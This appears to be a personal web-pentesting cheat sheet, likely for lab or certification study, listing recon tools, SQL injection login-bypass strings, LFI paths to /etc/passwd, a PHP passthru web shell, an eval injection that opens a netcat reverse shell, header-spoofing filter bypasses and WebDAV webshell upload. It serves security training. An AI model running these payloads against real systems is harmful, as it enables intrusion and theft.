Basic Recon

Web Application Assessment Methodology

What does the application do?
What language is it written in?
What server software is the application running on?

Web Application Enumeration

Programming language and frameworks
Web Server Software
Database software
Server Operating System

Web Checklist

# Default Credentials
- /robots.txt
- admin/admin, admin/password, admin/machine-name, machine-name/machine-name
- Search on google for default credential of the application
- Hydra
- /Fuzz - applciation/Fuzz - index.php/fuzz
- Fuzz with extension(.txt,.conf,txt,html,php,asp,aspx,jsp,db,sql,exe,config,db
bak,cgi,ps1,py,ini,js,sh,.php,.txt,.json,.html
- SQL Bypass Auth
- Entry Point: ' '' ` ') ") `) ')) ")) `)) 
- Password Field: ' || ''==' ( No SQL Injection Payload )
- admin' or 1==1 
- ' or 1=1 -- -
- ' || 1=1 -- -
- whatweb -v
- Customize login password with array  (username=admin&password[]=)
- /index.[php,html,asp.aspx] or /randomthing-get-error
- LFI / Directory Traversal -> SSH key
- LFI / Configuration of Service File
- Checking eval() 2+2 2*2
- Checking with POST request
- WordPress Plugin vulnerable
- Check Source Code to Find Plugin install
- Looking for hostname and Zone Transfer
- ?file=/etc/passwd (absolute path)
- ?file=../../../etc/passwd - ?file=../../../../etc/passwd
- ?file=../../../../var/log/apache2/access.log
- ?file=../../../../var/www/html/index.php

#Success Login
- Version (Exploit-db)
- File Upload
- User privilege might change 
- Code execution directly a new post/page
- Module? Extension? Addons?
- Create own Module, extension, addone (Malicious)
- Access through CMS to sensitive database information credentaisl
- Can we schedule any system level jobs?
- Escalate to Administration privilege
- Diagnostic Tools - System Level Execute?
- Configuration File?
- Modify or Inject php code on existing file?
<?php
<pre>
passthru($_GET['cmd']);
</pre>
?>
- page=index');eval('phpinfo();');#
- page=index');eval("(system('nc 10.10.10.10 443 -e /bin/bash');");#

WordPress

wpscan --url http://10.10.10.10 --enumerate ap,at,cb,dbe

Gobuster

gobuster dir -u http://10.10.10.10 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 50 -x.php

-x : specific file extension
-k : disable check certificate error
--exclude-length: exclude specific length not to display
-o: for output
-f: add / at the end of the file
-n: not to print specific status code
-w: wordlist
-t for thread

Create loop to scan

for i in uploads dev admin test; do
gobuster dir -u http://10.10.10.10/$i -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 50 -x.php -o gobuster.$i.log
done

Through Proxy

proxychains gobuster dir -u http://10.10.10.10 -w /usr/share/wordlists/common.txt -x html -t 50 --proxy socks5://127.0.0.1:8080

Dirbuster

dirb http://10.10.10.10/project -u admin:password

Nikto

nikto -h http://10.10.10.10
nikto -h http://10.10.10.10 -o nikto.html -Format htm

Username Enum

wfuzz -c -w /usr/share/seclists/Usernames/Names/names.txt -d "usename=FUZZ&password=anything" -hs "No Account found with that username" http://10.10.10.10/login.php

Curl Command

#Send HTTP GET request to each discovered directory and checking for 200 OK status
curl -I -L google.com

#send HTTP request with Header
curl -H "User-Agent: Mozilla Firefox" 10.10.10.10/secret

#Bypass Filter
curl http://10.10.10.10:13337/logs -H "X-Forwarded-For: localhost"
└─$ curl http://10.10.10.10:13337/logs?file=/etc/passwd -H "X-Forwarded-For: localhost"
└─$ curl -X POST http://10.10.10.10:13337/update -H "Content-Type: application/json" -H "X-Forwarded-For: localhost" --data '{"user":"admin","url":"http://10.10.10.10/shell"}'

#We can request with curl -d "" with no data which content-length: 0
└─$ curl -d "" -X POST http://10.10.10.10:33333/list-current-deployments
<p>Not Implemented</p>   

└─$ curl -d "" -X POST http://10.10.10.10:33333/list-running-procs 


└─$ proxychains curl -X POST --data "data=ls" -H 'X-Forwarded-For: 127.0.0.1' http://10.10.10.10/cmd.php

Webdev

#Running davtest tool.
davtest -url http://10.10.10.10/webdav
davtest -auth bob:password_123 -url http://10.10.10.10/webdav

#Interact with webdav 
cadaver http://10.10.10.10/webda
put /usr/share/webshells/asp/webshell.asp

Nmap

#Running http-enum nmap script to discover interesting directories.
nmap --script http-enum -sV -p 80 10.10.10.10

#Running Header script to get the IIS server header information.
nmap --script http-headers -sV -p 80 10.10.10.10

#Running http-methods script on /webdav path to discover all allowed methods
 nmap --script http-methods --script-args http-methods.url-path=/webdav/
10.10.10.10

#Running webdav scan Nmap script to identify WebDAV installations the script uses the
OPTIONS and PROPFIND methods to detect it
nmap --script http-webdav-scan --script-args http-methods.url-path=/webdav/
10.10.10.10

PreviousWeb Application NextCyber Security Courses Journey

Last updated 1 year ago

hashtagWeb Application Assessment Methodology

hashtagWeb Application Enumeration

hashtagWeb Checklist

hashtagWordPress

hashtagGobuster

hashtagCreate loop to scan

hashtagThrough Proxy

hashtagDirbuster

hashtagNikto

hashtagUsername Enum

hashtagCurl Command

hashtagWebdev

hashtagNmap

Web Application Assessment Methodology

Web Application Enumeration

Web Checklist

WordPress

Gobuster

Create loop to scan

Through Proxy

Dirbuster

Nikto

Username Enum

Curl Command

Webdev

Nmap